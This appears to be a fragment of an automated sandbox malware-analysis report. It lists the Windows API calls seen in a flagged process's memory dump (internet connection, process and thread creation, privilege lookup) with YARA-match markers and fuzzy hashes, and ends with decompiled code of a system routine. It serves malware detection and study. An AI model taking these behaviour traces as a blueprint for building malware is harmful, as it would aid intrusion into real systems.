                                              APIs
                                              • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 008B88C8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ConnectInternet
                                              • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                              • API String ID: 3050416762-1024195942
                                              • Opcode ID: 6677eb675f016cdf88c15852923043979f5537932403f1af99a9423d5bcf3d9b
                                              • Instruction ID: 4c3e392854cf5ed1941dfd5add3474ab0e3590950644d9b3618135a4e07fc853
                                              • Opcode Fuzzy Hash: 6677eb675f016cdf88c15852923043979f5537932403f1af99a9423d5bcf3d9b
                                              • Instruction Fuzzy Hash: FA011BB2905159AFCB14DF88D981AEF7BB9FF48300F154198BA48A7241D630EA11CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 008B8847
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: InternetOpen
                                              • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                              • API String ID: 2038078732-3155091674
                                              • Opcode ID: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                                              • Instruction ID: 23a7627897b141311b856cbbeee834da830c8f4a7d86ce54c22c6a1d7e28f929
                                              • Opcode Fuzzy Hash: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                                              • Instruction Fuzzy Hash: CFF019B2901119AF8B14DF98DC419EBB7BCFF48310B048589FE18A7301D630AE10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 008B6F98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: 9af03f7d8b8f3cb13721ec944da4d2b0e0be474876f60c5ffa2889f2ab7990b6
                                              • Instruction ID: 82bc052fa2da8448638cc40b1295143d8ac9bb662bd94b7bc7856169aaecbb9f
                                              • Opcode Fuzzy Hash: 9af03f7d8b8f3cb13721ec944da4d2b0e0be474876f60c5ffa2889f2ab7990b6
                                              • Instruction Fuzzy Hash: B5318EB1601704ABC711DF68D8A1FABB7B8FB88700F00841DF65AAB341D734B555CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 008B6F98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: 4c1b2e4cdb3017c86f6cdbc8616693572d40ca00311d07818c95e84a71bb04d3
                                              • Instruction ID: e0c6b64fe20a5120d08a0640e817068b04d486c163ebc15652b72e5cefc2eb1e
                                              • Opcode Fuzzy Hash: 4c1b2e4cdb3017c86f6cdbc8616693572d40ca00311d07818c95e84a71bb04d3
                                              • Instruction Fuzzy Hash: 33217C71601704ABD711DEA8D8A1FAAB7A8FB48700F00801DF61AAB381D774A555CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,008ACCE0,?,?), ref: 008B705C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID: net.dll
                                              • API String ID: 2422867632-2431746569
                                              • Opcode ID: 34efaf8831cdb30c5b1d901828abbf96756301a3e5a8eac3acc7e1cbb31c290d
                                              • Instruction ID: a5d6402d796d90908b99045bda2c16b816a9dfe565f7cd8bfbbcfe3a326c18f7
                                              • Opcode Fuzzy Hash: 34efaf8831cdb30c5b1d901828abbf96756301a3e5a8eac3acc7e1cbb31c290d
                                              • Instruction Fuzzy Hash: 6F11C0722017046AD7219A68DC62FEBB7A8FBC5710F14451EF64AEB380E675B80687E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,008A3B93), ref: 008B850D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: .z`
                                              • API String ID: 3298025750-1441809116
                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                              • Instruction ID: 20ede1e983935d69c07b176f42e40129367e2a9d11ff49699af5932222b775c8
                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                              • Instruction Fuzzy Hash: EDE01AB1200208ABD714DF59CC45EA777ACEF88750F014555B90857241C630E910CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlAllocateHeap.NTDLL(008B3526,?,008B3C9F,008B3C9F,?,008B3526,?,?,?,?,?,00000000,00000000,?), ref: 008B84CD
                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008B85A4
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateCreateHeapInternalProcess
                                              • String ID:
                                              • API String ID: 2739015735-0
                                              • Opcode ID: 773b677b6bab77761c524d6934189164ab0c06201aa1f6b2fb0bbd70b4c41e82
                                              • Instruction ID: 57b850be0ae7f5a224b77cb28568e4387ce693d9362df3392a3d3c6e26f6bff4
                                              • Opcode Fuzzy Hash: 773b677b6bab77761c524d6934189164ab0c06201aa1f6b2fb0bbd70b4c41e82
                                              • Instruction Fuzzy Hash: D02147B2204208ABCB24DF98DC81EE777ADEF8C754F158659FA0D9B241C630F911CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 008A72CA
                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 008A72EB
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                                              • Instruction ID: 685f6f3a14b02b30bbdb8d713bf1f48b1916f517e148098fb2cb89a2763f0bcd
                                              • Opcode Fuzzy Hash: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                                              • Instruction Fuzzy Hash: B3018431A8022877F720A6989C03FFE776CAB01B51F150515FF08FA6C1E6946A0646F6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 008A9BA2
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                              • Instruction ID: c35e047748e5e25d089ce5446c3be00ae50625ac71a9f75b41047e7d211ff135
                                              • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                              • Instruction Fuzzy Hash: AA014CB5D0020DABDB10DAA4EC42FDEB3B8EB54308F004194E918D7241F671EA04CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008B85A4
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: f497bde5e983975b2f8647c71344713b189404eeeeda599071133b00268b416b
                                              • Instruction ID: 9038be0fba596a4b6d6b3446e06a8cd4740d4b78eb4dcb85d8669bcb141689dc
                                              • Opcode Fuzzy Hash: f497bde5e983975b2f8647c71344713b189404eeeeda599071133b00268b416b
                                              • Instruction Fuzzy Hash: 9E019DB2210108AFCB58CF99DC80EEB77ADAF8C354F158259BA0DE7251C630E851CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008B85A4
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                              • Instruction ID: f23facaba6d426f90e28fefcad17b4a5bcd04d32a7c68656c7b30c1a1709c5a9
                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                              • Instruction Fuzzy Hash: CD01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,008ACCE0,?,?), ref: 008B705C
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: 7605c94549fd1d28dc1871aeb6e7ddf134353a8e3cc3ab0d1d32422401d6de41
                                              • Instruction ID: 3c31a20b27ff65176a5fbd92558abc9be72c92f9750adfbe10a32245c8df17ed
                                              • Opcode Fuzzy Hash: 7605c94549fd1d28dc1871aeb6e7ddf134353a8e3cc3ab0d1d32422401d6de41
                                              • Instruction Fuzzy Hash: 81E06D333903043AE330659DAC02FE7B29CDB81B20F150026FA0DEA3C1D595F80142A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlAllocateHeap.NTDLL(008B3526,?,008B3C9F,008B3C9F,?,008B3526,?,?,?,?,?,00000000,00000000,?), ref: 008B84CD
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                              • Instruction ID: 33d2d9881da6dac262b4672a9c8fc6c753dc8592fbbe46b6e120e4bab7d137d6
                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                              • Instruction Fuzzy Hash: 46E01AB1200208ABD714DF59CC41EA777ACEF88650F154559BA085B241C530F910CBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,008ACFB2,008ACFB2,?,00000000,?,?), ref: 008B8670
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                              • Instruction ID: 98be86da72d51b43e5ab87e50dce5635ad6ecd615525f1a70ee5ad9d6ea53883
                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                              • Instruction Fuzzy Hash: 86E01AB1200208ABDB20DF49CC85EE737ADEF88650F018555BA0857241C930E8108BF5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,008A7C73,?), ref: 008AD44B
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                              • Instruction ID: a4feb2f29dd2ff907127da0273b398d2dc5bb9da00af8811cd165bf1455d9bfb
                                              • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                              • Instruction Fuzzy Hash: D3D0A7717503043BF610FAA89C03F6672CCAB49F00F494074F949D77C3D964F5004166
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 9462a56c5365b1fe7920c3be50954d8371b0dafa9d7a7310454d19cc95ef7f90
                                              • Instruction ID: c3f158cbffe681782324011edb5aa16bb8419f4a5f2411f302db49c9ffd2aa82
                                              • Opcode Fuzzy Hash: 9462a56c5365b1fe7920c3be50954d8371b0dafa9d7a7310454d19cc95ef7f90
                                              • Instruction Fuzzy Hash: 69B02BB18010C0C5F700E7604608F17390077E0300F13C611D2024340A0338D080F1B1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              C-Code - Quality: 53%
                                              			E048CFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                              				void* _t7;
                                              				intOrPtr _t9;
                                              				intOrPtr _t10;
                                              				intOrPtr* _t12;
                                              				intOrPtr* _t13;
                                              				intOrPtr _t14;
                                              				intOrPtr* _t15;
                                              
                                              				_t13 = __edx;
                                              				_push(_a4);
                                              				_t14 =  *[fs:0x18];
                                              				_t15 = _t12;
                                              				_t7 = E0487CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                              				_push(_t13);
                                              				E048C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                              				_t9 =  *_t15;
                                              				if(_t9 == 0xffffffff) {
                                              					_t10 = 0;
                                              				} else {
                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                              				}
                                              				_push(_t10);
                                              				_push(_t15);
                                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                                              				return E048C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                              			}










                                              0x048cfdda
                                              0x048cfde2
                                              0x048cfde5
                                              0x048cfdec
                                              0x048cfdfa
                                              0x048cfdff
                                              0x048cfe0a
                                              0x048cfe0f
                                              0x048cfe17
                                              0x048cfe1e
                                              0x048cfe19
                                              0x048cfe19
                                              0x048cfe19
                                              0x048cfe20
                                              0x048cfe21
                                              0x048cfe22
                                              0x048cfe25
                                              0x048cfe40

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 048CFDFA
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048CFE2B
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048CFE01
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 605522a0dd70d6945dde57a4cabd0fde6adfc4129ab3261a67748569c2962b06
                                              • Instruction ID: 6295d618810b006220675eb6e9af9ca639fe96f2a550b802e2b20bd5b90019ed
                                              • Opcode Fuzzy Hash: 605522a0dd70d6945dde57a4cabd0fde6adfc4129ab3261a67748569c2962b06
                                              • Instruction Fuzzy Hash: 67F0FC32640111FFEA201A45DC05F237B5ADB44730F144718F724965D1DAB2F86096F5
                                              Uniqueness

                                              Uniqueness Score: -1.00%